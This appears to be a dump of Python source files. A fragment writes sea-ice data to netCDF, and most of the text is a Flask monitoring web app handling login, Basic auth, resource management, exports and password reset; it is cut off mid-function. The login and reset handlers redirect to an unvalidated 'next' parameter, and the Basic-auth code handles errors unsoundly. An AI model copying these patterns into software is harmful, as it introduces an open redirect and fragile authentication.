(\'x\',),zlib=False)\n vnc.long_name = \'Longitude\'\n vnc.units = \'degree_east\'\n vnc.standard_name = \'longitude\'\n vnc[:] = lon\n\n vnc = f1.createVariable(\'latitude\', \'d\', (\'y\',),zlib=False)\n vnc.long_name = \'Latitude\'\n vnc.units = \'degree_north\'\n vnc.standard_name = \'latitude\'\n vnc[:] = lat\n\n v_time = f1.createVariable(\'time\', \'d\', (\'time\',),zlib=False)\n v_time.long_name = \'Years\'\n v_time.units = \'Years\'\n v_time.field = \'time, scalar, series\'\n v_time[:]=time \n \n v_temp=f1.createVariable(\'SIC\', \'d\', (\'time\', \'y\', 
\'x\',),zlib=False)\n v_temp.long_name = ""Sea-ice area fraction (%)""\n v_temp.units = ""%""\n v_temp.time = ""time""\n v_temp.field=""SIC, scalar, series""\n v_temp.missing_value = 1e20\n \n \n if myvarname==\'sic\':\n f1.variables[\'SIC\'][:,:,:] = mydata\n \n f1.close()\n', '# =================================================================\n#\n# Authors: Tom Kralidis dummy@email.com\n# Just van den Broecke dummy@email.com\n#\n# Copyright (c) 2014 Tom Kralidis\n#\n# Permission is hereby granted, free of charge, to any person\n# obtaining a copy of this software and associated documentation\n# files (the ""Software""), to deal in the Software without\n# restriction, including without limitation the rights to use,\n# copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following\n# conditions:\n#\n# The above copyright notice and this permission notice shall be\n# included in all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED ""AS IS"", WITHOUT WARRANTY OF ANY KIND,\n# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES\n# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND\n# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT\n# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,\n# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\n# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR\n# OTHER DEALINGS IN THE SOFTWARE.\n#\n# =================================================================\n\nimport base64\nimport csv\nimport json\nimport logging\nfrom io import StringIO\n\nfrom flask import (abort, flash, g, jsonify, redirect,\n render_template, request, url_for)\nfrom flask_babel import gettext\nfrom flask_login import (LoginManager, login_user, logout_user,\n current_user, login_required)\nfrom flask_migrate import Migrate\nfrom itertools import chain\n\nimport views\nfrom __init__ import __version__\nfrom enums import RESOURCE_TYPES\nfrom factory import Factory\nfrom init import App\nfrom models import Resource, Run, ProbeVars, CheckVars, Tag, User, Recipient\nfrom resourceauth import ResourceAuth\nfrom util import send_email, geocode, format_checked_datetime, \\\n format_run_status, format_obj_value\n\n# Module globals for convenience\nLOGGER = logging.getLogger(__name__)\nAPP = App.get_app()\nCONFIG = App.get_config()\nDB = App.get_db()\nBABEL = App.get_babel()\n\nMIGRATE = Migrate(APP, DB)\n\nLOGIN_MANAGER = LoginManager()\nLOGIN_MANAGER.init_app(APP)\n\nLANGUAGES = (\n (\'en\', \'English\'),\n (\'fr\', \'Français\'),\n (\'de\', \'German\'),\n (\'nl_NL\', \'Nederlands (Nederland)\'),\n (\'es_BO\', \'Español (Bolivia)\'),\n (\'hr_HR\', \'Croatian (Croatia)\')\n)\n\n# Should GHC Runner be run within GHC webapp?\nif CONFIG[\'GHC_RUNNER_IN_WEBAPP\'] is True:\n LOGGER.info(\'Running GHC Scheduler in WebApp\')\n from scheduler import start_schedule\n\n # Start scheduler\n start_schedule()\nelse:\n LOGGER.info(\'NOT Running GHC Scheduler in WebApp\')\n\n\n# commit or rollback shorthand\ndef db_commit():\n err = None\n try:\n DB.session.commit()\n except Exception:\n DB.session.rollback()\n # finally:\n # DB.session.close()\n return err\n\n\n@APP.before_request\ndef before_request():\n g.user = current_user\n if request.args and \'lang\' in request.args and request.args[\'lang\'] != \'\':\n g.current_lang = request.args[\'lang\']\n if not hasattr(g, \'current_lang\'):\n 
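# --- Aside: a hedged minimal sketch of the netCDF4 write pattern used by
# writeCMIP5File() above -- create dimensions, create variables, assign
# arrays, close. Filename and sizes are illustrative:
import numpy as np
from netCDF4 import Dataset

def write_minimal(path='example.nc'):
    ds = Dataset(path, mode='w', format='NETCDF3_CLASSIC')
    ds.createDimension('time', None)  # None makes the record dim unlimited
    ds.createDimension('y', 2)
    ds.createDimension('x', 3)
    v = ds.createVariable('SIC', 'd', ('time', 'y', 'x'))
    v.units = '%'
    v[0, :, :] = np.zeros((2, 3))  # writing index 0 grows the record dim
    ds.close()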
g.current_lang = \'en\'\n\n if CONFIG[\'GHC_REQUIRE_WEBAPP_AUTH\'] is True:\n # Login is required to access GHC Webapp.\n # We need to pass-through static resources like CSS.\n if any([\'/static/\' in request.path,\n request.path.endswith(\'.ico\'),\n g.user.is_authenticated(), # This is from Flask-Login\n (request.endpoint is not None\n and getattr(APP.view_functions[request.endpoint],\n \'is_public\', False))]):\n return # Access granted\n else:\n return redirect(url_for(\'login\'))\n\n\n# Marks (endpoint-) function as always to be accessible\n# (used for GHC_REQUIRE_WEBAPP_AUTH)\ndef public_route(decorated_function):\n decorated_function.is_public = True\n return decorated_function\n\n\n@APP.teardown_appcontext\ndef shutdown_session(exception=None):\n DB.session.remove()\n\n\n@BABEL.localeselector\ndef get_locale():\n return g.get(\'current_lang\', \'en\')\n # return request.accept_languages.best_match(LANGUAGES.keys())\n\n\n@LOGIN_MANAGER.user_loader\ndef load_user(identifier):\n return User.query.get(int(identifier))\n\n\n@LOGIN_MANAGER.unauthorized_handler\ndef unauthorized_callback():\n if request.query_string:\n url = \'%s%s?%s\' % (request.script_root, request.path,\n request.query_string)\n else:\n url = \'%s%s\' % (request.script_root, request.path)\n return redirect(url_for(\'login\', lang=g.current_lang, next=url))\n\n\n@LOGIN_MANAGER.request_loader\ndef load_user_from_request(request):\n\n # Try to login using Basic Auth\n # Inspiration: https://flask-login.readthedocs.io\n # /en/latest/#custom-login-using-request-loader\n basic_auth_val = request.headers.get(\'Authorization\')\n if basic_auth_val:\n basic_auth_val = basic_auth_val.replace(\'Basic \', \'\', 1)\n authenticated = False\n try:\n username, password = base64.b64decode(basic_auth_val).split(\':\')\n\n user = User.query.filter_by(username=username).first()\n if user:\n authenticated = user.authenticate(password)\n finally:\n # Ignore errors, they should all fail the auth attempt\n pass\n\n if not authenticated:\n LOGGER.warning(\'Unauthorized access for user=%s\' % username)\n abort(401)\n else:\n return user\n\n # TODO: may add login via api-key or token here\n\n # finally, return None if both methods did not login the user\n return None\n\n\n@APP.template_filter(\'cssize_reliability\')\ndef cssize_reliability(value, css_type=None):\n """"""returns CSS button class snippet based on score""""""\n\n number = int(value)\n\n if CONFIG[\'GHC_RELIABILITY_MATRIX\'][\'red\'][\'min\'] <= number <= \\\n CONFIG[\'GHC_RELIABILITY_MATRIX\'][\'red\'][\'max\']:\n score = \'danger\'\n panel = \'red\'\n elif (CONFIG[\'GHC_RELIABILITY_MATRIX\'][\'orange\'][\'min\'] <= number <=\n CONFIG[\'GHC_RELIABILITY_MATRIX\'][\'orange\'][\'max\']):\n score = \'warning\'\n panel = \'yellow\'\n elif (CONFIG[\'GHC_RELIABILITY_MATRIX\'][\'green\'][\'min\'] <= number <=\n CONFIG[\'GHC_RELIABILITY_MATRIX\'][\'green\'][\'max\']):\n score = \'success\'\n panel = \'green\'\n else: # should never really get here\n score = \'info\'\n panel = \'blue\'\n\n if css_type is not None and css_type == \'panel\':\n return panel\n else:\n return score\n\n\n@APP.template_filter(\'cssize_reliability2\')\ndef cssize_reliability2(value):\n """"""returns CSS panel class snippet based on score""""""\n\n return cssize_reliability(value, \'panel\')\n\n\n@APP.template_filter(\'round2\')\ndef round2(value):\n """"""rounds a number to 2 decimal places except for values of 0 or 100""""""\n\n if value in [0.0, 100.0]:\n return int(value)\n return round(value, 
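# --- Aside: a hedged, framework-free version of the Basic-Auth parsing in
# load_user_from_request() above. Note b64decode() returns bytes on
# Python 3, so decode before splitting, and partition(':') tolerates
# passwords that themselves contain colons:
import base64

def parse_basic_auth(header_value):
    '''"Basic dXNlcjpwYXNz" -> ("user", "pass"), or None.'''
    if not header_value or not header_value.startswith('Basic '):
        return None
    raw = base64.b64decode(header_value[len('Basic '):]).decode('utf-8')
    username, sep, password = raw.partition(':')
    return (username, password) if sep else None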
2)\n\n\n@APP.context_processor\ndef context_processors():\n """"""global context processors for templates""""""\n\n rtc = views.get_resource_types_counts()\n tags = views.get_tag_counts()\n return {\n \'app_version\': __version__,\n \'resource_types\': RESOURCE_TYPES,\n \'resource_types_counts\': rtc[\'counts\'],\n \'resources_total\': rtc[\'total\'],\n \'languages\': LANGUAGES,\n \'tags\': tags,\n \'tagnames\': list(tags.keys())\n }\n\n\n@APP.route(\'/\')\ndef home():\n """"""homepage""""""\n\n response = views.get_health_summary()\n return render_template(\'home.html\', response=response)\n\n\n@APP.route(\'/csv\', endpoint=\'csv\')\n@APP.route(\'/json\', endpoint=\'json\')\ndef export():\n """"""export resource list as JSON""""""\n\n resource_type = None\n\n if request.args.get(\'resource_type\') in RESOURCE_TYPES.keys():\n resource_type = request.args[\'resource_type\']\n\n query = request.args.get(\'q\')\n\n response = views.list_resources(resource_type, query)\n\n if request.url_rule.rule == \'/json\':\n json_dict = {\'total\': response[\'total\'], \'resources\': []}\n for r in response[\'resources\']:\n try:\n ghc_url = \'%s/resource/%s\' % \\\n (CONFIG[\'GHC_SITE_URL\'], r.identifier)\n last_run_report = \'-\'\n if r.last_run:\n last_run_report = r.last_run.report\n\n json_dict[\'resources\'].append({\n \'resource_type\': r.resource_type,\n \'title\': r.title,\n \'url\': r.url,\n \'ghc_url\': ghc_url,\n \'ghc_json\': \'%s/json\' % ghc_url,\n \'ghc_csv\': \'%s/csv\' % ghc_url,\n \'first_run\': format_checked_datetime(r.first_run),\n \'last_run\': format_checked_datetime(r.last_run),\n \'status\': format_run_status(r.last_run),\n \'min_response_time\': round(r.min_response_time, 2),\n \'average_response_time\': round(r.average_response_time, 2),\n \'max_response_time\': round(r.max_response_time, 2),\n \'reliability\': round(r.reliability, 2),\n \'last_report\': format_obj_value(last_run_report)\n })\n except Exception as e:\n LOGGER.warning(\n \'JSON error resource id=%d: %s\' % (r.identifier, str(e)))\n\n return jsonify(json_dict)\n elif request.url_rule.rule == \'/csv\':\n output = StringIO()\n writer = csv.writer(output)\n header = [\n \'resource_type\', \'title\', \'url\', \'ghc_url\', \'ghc_json\', \'ghc_csv\',\n \'first_run\', \'last_run\', \'status\', \'min_response_time\',\n \'average_response_time\', \'max_response_time\', \'reliability\'\n ]\n writer.writerow(header)\n for r in response[\'resources\']:\n try:\n ghc_url = \'%s%s\' % (CONFIG[\'GHC_SITE_URL\'],\n url_for(\'get_resource_by_id\',\n identifier=r.identifier))\n\n writer.writerow([\n r.resource_type,\n r.title,\n r.url,\n ghc_url,\n \'%s/json\' % ghc_url,\n \'%s/csv\' % ghc_url,\n format_checked_datetime(r.first_run),\n format_checked_datetime(r.last_run),\n format_run_status(r.last_run),\n round(r.min_response_time, 2),\n round(r.average_response_time, 2),\n round(r.max_response_time, 2),\n round(r.reliability, 2)\n ])\n except Exception as e:\n LOGGER.warning(\n \'CSV error resource id=%d: %s\' % (r.identifier, str(e)))\n\n return output.getvalue(), 200, {\'Content-type\': \'text/csv\'}\n\n\n@APP.route(\'/opensearch\')\ndef opensearch():\n """"""generate OpenSearch description document""""""\n\n content = render_template(\'opensearch_description.xml\')\n\n return content, 200, {\'Content-type\': \'text/xml\'}\n\n\n@APP.route(\'/resource//csv\', endpoint=\'csv-resource\')\n@APP.route(\'/resource//json\', endpoint=\'json-resource\')\ndef export_resource(identifier):\n """"""export resource as JSON or CSV""""""\n\n 
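# --- Aside: the framework-independent core of the CSV branch in export()
# above -- csv.writer over an in-memory StringIO, with the result served
# as text/csv. A hedged sketch:
import csv
from io import StringIO

def rows_to_csv(header, rows):
    buf = StringIO()
    writer = csv.writer(buf)
    writer.writerow(header)
    writer.writerows(rows)
    return buf.getvalue()  # caller serves this with Content-type: text/csv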
resource = views.get_resource_by_id(identifier)\n\n history_csv = \'%s/resource/%s/history/csv\' % (CONFIG[\'GHC_SITE_URL\'],\n resource.identifier)\n history_json = \'%s/resource/%s/history/json\' % (CONFIG[\'GHC_SITE_URL\'],\n resource.identifier)\n if \'json\' in request.url_rule.rule:\n last_run_report = \'-\'\n if resource.last_run:\n last_run_report = resource.last_run.report\n\n json_dict = {\n \'identifier\': resource.identifier,\n \'title\': resource.title,\n \'url\': resource.url,\n \'resource_type\': resource.resource_type,\n \'owner\': resource.owner.username,\n \'min_response_time\': resource.min_response_time,\n \'average_response_time\': resource.average_response_time,\n \'max_response_time\': resource.max_response_time,\n \'reliability\': resource.reliability,\n \'status\': format_run_status(resource.last_run),\n \'first_run\': format_checked_datetime(resource.first_run),\n \'last_run\': format_checked_datetime(resource.last_run),\n \'history_csv\': history_csv,\n \'history_json\': history_json,\n \'last_report\': format_obj_value(last_run_report)\n }\n return jsonify(json_dict)\n elif \'csv\' in request.url_rule.rule:\n output = StringIO()\n writer = csv.writer(output)\n header = [\n \'identifier\', \'title\', \'url\', \'resource_type\', \'owner\',\n \'min_response_time\', \'average_response_time\', \'max_response_time\',\n \'reliability\', \'status\', \'first_run\', \'last_run\', \'history_csv\',\n \'history_json\'\n ]\n\n writer.writerow(header)\n writer.writerow([\n resource.identifier,\n resource.title,\n resource.url,\n resource.resource_type,\n resource.owner.username,\n resource.min_response_time,\n resource.average_response_time,\n resource.max_response_time,\n resource.reliability,\n format_run_status(resource.last_run),\n format_checked_datetime(resource.first_run),\n format_checked_datetime(resource.last_run),\n history_csv,\n history_json\n ])\n return output.getvalue(), 200, {\'Content-type\': \'text/csv\'}\n\n\n@APP.route(\'/resource//history/csv\',\n endpoint=\'csv-resource-history\')\n@APP.route(\'/resource//history/json\',\n endpoint=\'json-resource-history\')\ndef export_resource_history(identifier):\n """"""export resource history as JSON or CSV""""""\n\n resource = views.get_resource_by_id(identifier)\n\n if \'json\' in request.url_rule.rule:\n json_dict = {\'runs\': []}\n\n for run in resource.runs:\n json_dict[\'runs\'].append({\n \'owner\': resource.owner.username,\n \'resource_type\': resource.resource_type,\n \'checked_datetime\': format_checked_datetime(run),\n \'title\': resource.title,\n \'url\': resource.url,\n \'response_time\': round(run.response_time, 2),\n \'status\': format_run_status(run)\n })\n return jsonify(json_dict)\n elif \'csv\' in request.url_rule.rule:\n output = StringIO()\n writer = csv.writer(output)\n header = [\n \'owner\', \'resource_type\', \'checked_datetime\', \'title\', \'url\',\n \'response_time\', \'status\'\n ]\n writer.writerow(header)\n for run in resource.runs:\n writer.writerow([\n resource.owner.username,\n resource.resource_type,\n format_checked_datetime(run),\n resource.title,\n resource.url,\n round(run.response_time, 2),\n format_run_status(run),\n ])\n return output.getvalue(), 200, {\'Content-type\': \'text/csv\'}\n\n\n@APP.route(\'/settings\')\ndef settings():\n """"""settings""""""\n pass\n\n\n@APP.route(\'/resources\')\ndef resources():\n """"""lists resources with optional filter""""""\n\n resource_type = None\n\n if request.args.get(\'resource_type\') in RESOURCE_TYPES.keys():\n resource_type = 
request.args[\'resource_type\']\n\n tag = request.args.get(\'tag\')\n\n query = request.args.get(\'q\')\n\n response = views.list_resources(resource_type, query, tag)\n return render_template(\'resources.html\', response=response)\n\n\n@APP.route(\'/resource/<identifier>\')\ndef get_resource_by_id(identifier):\n """"""show resource""""""\n\n response = views.get_resource_by_id(identifier)\n return render_template(\'resource.html\', resource=response)\n\n\n@APP.route(\'/register\', methods=[\'GET\', \'POST\'])\ndef register():\n """"""register a new user""""""\n if not CONFIG[\'GHC_SELF_REGISTER\']:\n msg1 = gettext(\'This site is not configured for self-registration\')\n msg2 = gettext(\'Please contact\')\n msg = \'%s. %s %s\' % (msg1, msg2,\n CONFIG[\'GHC_ADMIN_EMAIL\'])\n flash(\'%s\' % msg, \'danger\')\n return render_template(\'register.html\', errmsg=msg)\n if request.method == \'GET\':\n return render_template(\'register.html\')\n\n # Check for existing user or email\n user = User.query.filter_by(username=request.form[\'username\']).first()\n email = User.query.filter_by(email=request.form[\'email\']).first()\n if user or email:\n flash(\'%s\' % gettext(\'Invalid username or email\'), \'danger\')\n return render_template(\'register.html\')\n\n user = User(request.form[\'username\'],\n request.form[\'password\'], request.form[\'email\'])\n\n DB.session.add(user)\n try:\n DB.session.commit()\n except Exception as err:\n DB.session.rollback()\n # str(err) is portable; err.message exists on Python 2 only\n bad_column = str(err).split()[2]\n bad_value = request.form[bad_column]\n msg = gettext(\'already registered\')\n flash(\'%s %s %s\' % (bad_column, bad_value, msg), \'danger\')\n return redirect(url_for(\'register\', lang=g.current_lang))\n return redirect(url_for(\'login\', lang=g.current_lang))\n\n\n@APP.route(\'/add\', methods=[\'GET\', \'POST\'])\n@login_required\ndef add():\n """"""add resource""""""\n if not g.user.is_authenticated():\n return render_template(\'add.html\')\n if request.method == \'GET\':\n return render_template(\'add.html\')\n resource_type = request.form[\'resource_type\']\n tags = request.form.getlist(\'tags\')\n url = request.form[\'url\'].strip()\n resources_to_add = []\n\n from healthcheck import sniff_test_resource, run_test_resource\n sniffed_resources = sniff_test_resource(CONFIG, resource_type, url)\n\n if not sniffed_resources:\n msg = gettext(""No resources detected"")\n # No exception context here, so log a plain warning\n LOGGER.warning(msg)\n flash(msg, \'danger\')\n\n for (resource_type, resource_url,\n title, success, response_time,\n message, start_time, resource_tags,) in sniffed_resources:\n\n tags_to_add = []\n for tag in chain(tags, resource_tags):\n tag_obj = tag\n if not isinstance(tag, Tag):\n tag_obj = Tag.query.filter_by(name=tag).first()\n if tag_obj is None:\n tag_obj = Tag(name=tag)\n tags_to_add.append(tag_obj)\n\n resource_to_add = Resource(current_user,\n resource_type,\n title,\n resource_url,\n tags=tags_to_add)\n\n resources_to_add.append(resource_to_add)\n probe_to_add = None\n checks_to_add = []\n\n # Always add a default Probe and Check(s)\n # from the GHC_PROBE_DEFAULTS conf\n if resource_type in CONFIG[\'GHC_PROBE_DEFAULTS\']:\n resource_settings = CONFIG[\'GHC_PROBE_DEFAULTS\'][resource_type]\n probe_class = resource_settings[\'probe_class\']\n if probe_class:\n # Add the default Probe\n probe_obj = Factory.create_obj(probe_class)\n probe_to_add = ProbeVars(\n resource_to_add, probe_class,\n probe_obj.get_default_parameter_values())\n\n # Add optional default (parameterized)\n # Checks to add to this Probe\n checks_info = 
probe_obj.get_checks_info()\n checks_param_info = probe_obj.get_plugin_vars()[\'CHECKS_AVAIL\']\n for check_class in checks_info:\n check_param_info = checks_param_info[check_class]\n if \'default\' in checks_info[check_class]:\n if checks_info[check_class][\'default\']:\n # Filter out params for Check with fixed values\n param_defs = check_param_info[\'PARAM_DEFS\']\n param_vals = {}\n for param in param_defs:\n if param_defs[param][\'value\']:\n param_vals[param] = \\\n param_defs[param][\'value\']\n check_vars = CheckVars(\n probe_to_add, check_class, param_vals)\n checks_to_add.append(check_vars)\n\n result = run_test_resource(resource_to_add)\n\n run_to_add = Run(resource_to_add, result)\n\n DB.session.add(resource_to_add)\n # prepopulate notifications for current user\n resource_to_add.set_recipients(\'email\', [g.user.email])\n\n if probe_to_add:\n DB.session.add(probe_to_add)\n for check_to_add in checks_to_add:\n DB.session.add(check_to_add)\n DB.session.add(run_to_add)\n\n try:\n DB.session.commit()\n msg = gettext(\'Services registered\')\n flash(\'%s (%s, %s)\' % (msg, resource_type, url), \'success\')\n except Exception as err:\n DB.session.rollback()\n flash(str(err), \'danger\')\n return redirect(url_for(\'home\', lang=g.current_lang))\n\n if len(resources_to_add) == 1:\n return edit_resource(resources_to_add[0].identifier)\n return redirect(url_for(\'home\', lang=g.current_lang))\n\n\n@APP.route(\'/resource//update\', methods=[\'POST\'])\n@login_required\ndef update(resource_identifier):\n """"""update a resource""""""\n\n update_counter = 0\n status = \'success\'\n\n try:\n resource_identifier_dict = request.get_json()\n\n resource = Resource.query.filter_by(\n identifier=resource_identifier).first()\n\n for key, value in resource_identifier_dict.items():\n if key == \'tags\':\n resource_tags = [t.name for t in resource.tags]\n\n tags_to_add = set(value) - set(resource_tags)\n tags_to_delete = set(resource_tags) - set(value)\n\n # Existing Tags: create relation else add new Tag\n all_tag_objs = Tag.query.all()\n for tag in tags_to_add:\n tag_add_obj = None\n for tag_obj in all_tag_objs:\n if tag == tag_obj.name:\n # use existing\n tag_add_obj = tag_obj\n break\n\n if not tag_add_obj:\n # add new\n tag_add_obj = Tag(name=tag)\n DB.session.add(tag_add_obj)\n\n resource.tags.append(tag_add_obj)\n\n for tag in tags_to_delete:\n tag_to_delete = Tag.query.filter_by(name=tag).first()\n resource.tags.remove(tag_to_delete)\n\n update_counter += 1\n elif key == \'probes\':\n # Remove all existing ProbeVars for Resource\n for probe_var in resource.probe_vars:\n resource.probe_vars.remove(probe_var)\n\n # Add ProbeVars anew each with optional CheckVars\n for probe in value:\n LOGGER.info(\'adding Probe class=%s parms=%s\' %\n (probe[\'probe_class\'], str(probe)))\n probe_vars = ProbeVars(resource, probe[\'probe_class\'],\n probe[\'parameters\'])\n for check in probe[\'checks\']:\n check_vars = CheckVars(\n probe_vars, check[\'check_class\'],\n check[\'parameters\'])\n probe_vars.check_vars.append(check_vars)\n\n resource.probe_vars.append(probe_vars)\n\n update_counter += 1\n elif key == \'notify_emails\':\n resource.set_recipients(\'email\',\n [v for v in value if v.strip()])\n elif key == \'notify_webhooks\':\n resource.set_recipients(\'webhook\',\n [v for v in value if v.strip()])\n elif key == \'auth\':\n resource.auth = value\n elif getattr(resource, key) != resource_identifier_dict[key]:\n # Update other resource attrs, mainly \'name\'\n setattr(resource, key, 
resource_identifier_dict[key])\n min_run_freq = CONFIG[\'GHC_MINIMAL_RUN_FREQUENCY_MINS\']\n if int(resource.run_frequency) < min_run_freq:\n resource.run_frequency = min_run_freq\n update_counter += 1\n\n # Always update geo-IP: maybe failure on creation or\n # IP-address of URL may have changed.\n latitude, longitude = geocode(resource.url)\n if latitude != 0.0 and longitude != 0.0:\n # Only update for valid lat/lon\n resource.latitude = latitude\n resource.longitude = longitude\n update_counter += 1\n\n except Exception as err:\n LOGGER.error(""Cannot update resource: %s"", err, exc_info=err)\n DB.session.rollback()\n status = str(err)\n update_counter = 0\n # finally:\n # DB.session.close()\n\n if update_counter > 0:\n err = db_commit()\n if err:\n status = str(err)\n\n return jsonify({\'status\': status})\n\n\n@APP.route(\'/resource/<resource_identifier>/test\', methods=[\'GET\', \'POST\'])\n@login_required\ndef test(resource_identifier):\n """"""test a resource""""""\n resource = Resource.query.filter_by(identifier=resource_identifier).first()\n if resource is None:\n flash(gettext(\'Resource not found\'), \'danger\')\n return redirect(request.referrer)\n\n from healthcheck import run_test_resource\n result = run_test_resource(\n resource)\n\n if request.method == \'GET\':\n if result.message == \'Skipped\':\n msg = gettext(\'INFO\')\n flash(\'%s: %s\' % (msg, result.message), \'info\')\n elif result.message not in [\'OK\', None, \'None\']:\n msg = gettext(\'ERROR\')\n flash(\'%s: %s\' % (msg, result.message), \'danger\')\n else:\n flash(gettext(\'Resource tested successfully\'), \'success\')\n\n return redirect(url_for(\'get_resource_by_id\', lang=g.current_lang,\n identifier=resource_identifier))\n elif request.method == \'POST\':\n return jsonify(result.get_report())\n\n\n@APP.route(\'/resource/<resource_identifier>/edit\')\n@login_required\ndef edit_resource(resource_identifier):\n """"""edit a resource""""""\n resource = Resource.query.filter_by(identifier=resource_identifier).first()\n if resource is None:\n flash(gettext(\'Resource not found\'), \'danger\')\n return redirect(request.referrer)\n\n probes_avail = views.get_probes_avail(resource.resource_type, resource)\n\n suggestions = json.dumps(Recipient.get_suggestions(\'email\',\n g.user.username))\n\n return render_template(\'edit_resource.html\',\n lang=g.current_lang,\n resource=resource,\n suggestions=suggestions,\n auths_avail=ResourceAuth.get_auth_defs(),\n probes_avail=probes_avail)\n\n\n@APP.route(\'/resource/<resource_identifier>/delete\')\n@login_required\ndef delete(resource_identifier):\n """"""delete a resource""""""\n resource = Resource.query.filter_by(identifier=resource_identifier).first()\n # Check existence before touching resource.owner to avoid an\n # AttributeError on a missing resource\n if resource is None:\n flash(gettext(\'Resource not found\'), \'danger\')\n return redirect(url_for(\'home\', lang=g.current_lang))\n\n if g.user.role != \'admin\' and g.user.username != resource.owner.username:\n msg = gettext(\'You do not have access to delete this resource\')\n flash(msg, \'danger\')\n return redirect(url_for(\'get_resource_by_id\', lang=g.current_lang,\n identifier=resource_identifier))\n\n resource.clear_recipients()\n DB.session.delete(resource)\n\n try:\n DB.session.commit()\n flash(gettext(\'Resource deleted\'), \'success\')\n return redirect(url_for(\'home\', lang=g.current_lang))\n except Exception as err:\n DB.session.rollback()\n flash(str(err), \'danger\')\n # request.referrer is already a URL, not an endpoint name\n return redirect(request.referrer)\n\n\n@APP.route(\'/probe/<probe_class>/<resource_identifier>/edit_form\')\n@APP.route(\'/probe/<probe_class>/edit_form\')\n@login_required\ndef get_probe_edit_form(probe_class, 
resource_identifier=None):\n """"""get the form to edit a Probe""""""\n\n probe_obj = Factory.create_obj(probe_class)\n if resource_identifier:\n resource = views.get_resource_by_id(resource_identifier)\n if resource:\n probe_obj._resource = resource\n probe_obj.expand_params(resource)\n\n probe_info = probe_obj.get_plugin_vars()\n probe_vars = ProbeVars(\n None, probe_class, probe_obj.get_default_parameter_values())\n\n # Get only the default Checks for this Probe class\n checks_avail = probe_obj.get_checks_info_defaults()\n checks_avail = probe_obj.expand_check_vars(checks_avail)\n\n for check_class in checks_avail:\n check_obj = Factory.create_obj(check_class)\n check_params = check_obj.get_default_parameter_values()\n probe_check_param_defs = \\\n probe_info[\'CHECKS_AVAIL\'][check_class][\'PARAM_DEFS\']\n for param in probe_check_param_defs:\n if \'value\' in probe_check_param_defs[param]:\n check_params[param] = probe_check_param_defs[param][\'value\']\n\n # Appends \'check_vars\' to \'probe_vars\' (SQLAlchemy)\n CheckVars(probe_vars, check_class, check_params)\n\n return render_template(\'includes/probe_edit_form.html\',\n lang=g.current_lang,\n probe=probe_vars, probe_info=probe_info)\n\n\n@APP.route(\'/check//edit_form\')\n@login_required\ndef get_check_edit_form(check_class):\n """"""get the form to edit a Check""""""\n\n check_obj = Factory.create_obj(check_class)\n check_info = check_obj.get_plugin_vars()\n check_vars = CheckVars(\n None, check_class, check_obj.get_default_parameter_values())\n\n return render_template(\'includes/check_edit_form.html\',\n lang=g.current_lang,\n check=check_vars, check_info=check_info)\n\n\n@APP.route(\'/login\', methods=[\'GET\', \'POST\'])\n@public_route\ndef login():\n """"""login""""""\n if request.method == \'GET\':\n return render_template(\'login.html\')\n username = request.form[\'username\']\n password = request.form[\'password\']\n registered_user = User.query.filter_by(username=username).first()\n authenticated = False\n if registered_user:\n # May not have upgraded to pw encryption: warn\n if len(registered_user.password) < 80:\n msg = \'Please upgrade GHC to encrypted passwords first, see docs!\'\n flash(gettext(msg), \'danger\')\n return redirect(url_for(\'login\', lang=g.current_lang))\n\n try:\n authenticated = registered_user.authenticate(password)\n finally:\n pass\n\n if not authenticated:\n flash(gettext(\'Invalid username and / or password\'), \'danger\')\n return redirect(url_for(\'login\', lang=g.current_lang))\n\n # Login ok\n login_user(registered_user)\n\n if \'next\' in request.args:\n return redirect(request.args.get(\'next\'))\n return redirect(url_for(\'home\', lang=g.current_lang))\n\n\n@APP.route(\'/logout\')\ndef logout():\n """"""logout""""""\n logout_user()\n flash(gettext(\'Logged out\'), \'success\')\n if request.referrer:\n return redirect(request.referrer)\n else:\n return redirect(url_for(\'home\', lang=g.current_lang))\n\n\n@APP.route(\'/reset_req\', methods=[\'GET\', \'POST\'])\n@public_route\ndef reset_req():\n """"""\n Reset password request handling.\n """"""\n if request.method == \'GET\':\n return render_template(\'reset_password_request.html\')\n\n # Reset request form with email\n email = request.form[\'email\']\n registered_user = User.query.filter_by(email=email).first()\n if registered_user is None:\n LOGGER.warn(\'Invalid email for reset_req: %s\' % email)\n flash(gettext(\'Invalid email\'), \'danger\')\n return redirect(url_for(\'reset_req\', lang=g.current_lang))\n\n # Generate reset url 
using user-specific token\n token = registered_user.get_token()\n reset_url = \'%s/reset/%s\' % (CONFIG[\'GHC_SITE_URL\'], token)\n\n # Create message body with reset link\n msg_body = render_template(\'reset_password_email.txt\',\n lang=g.current_lang, config=CONFIG,\n reset_url=reset_url,\n username=registered_user.username)\n\n try:\n from email.mime.text import MIMEText\n from email.utils import formataddr\n msg = MIMEText(msg_body, \'plain\', \'utf-8\')\n msg[\'From\'] = formataddr((CONFIG[\'GHC_SITE_TITLE\'],\n CONFIG[\'GHC_ADMIN_EMAIL\']))\n msg[\'To\'] = registered_user.email\n msg[\'Subject\'] = \'[%s] %s\' % (CONFIG[\'GHC_SITE_TITLE\'],\n gettext(\'reset password\'))\n\n from_addr = \'%s <%s>\' % (CONFIG[\'GHC_SITE_TITLE\'],\n CONFIG[\'GHC_ADMIN_EMAIL\'])\n\n to_addr = registered_user.email\n\n msg_text = msg.as_string()\n send_email(CONFIG[\'GHC_SMTP\'], from_addr, to_addr, msg_text)\n except Exception as err:\n msg = \'Cannot send email. Contact admin: \'\n LOGGER.warn(msg + \' err=\' + str(err))\n flash(gettext(msg) + CONFIG[\'GHC_ADMIN_EMAIL\'], \'danger\')\n return redirect(url_for(\'login\', lang=g.current_lang))\n\n flash(gettext(\'Password reset link sent via email\'), \'success\')\n\n if \'next\' in request.args:\n return redirect(request.args.get(\'next\'))\n return redirect(url_for(\'home\', lang=g.current_lang))\n\n\n@APP.route(\'/reset/\', methods=[\'GET\', \'POST\'])\n@public_route\ndef reset(token=None):\n """"""\n Reset password submit form handling.\n """"""\n\n # Must have at least a token to proceed.\n if token is None:\n return 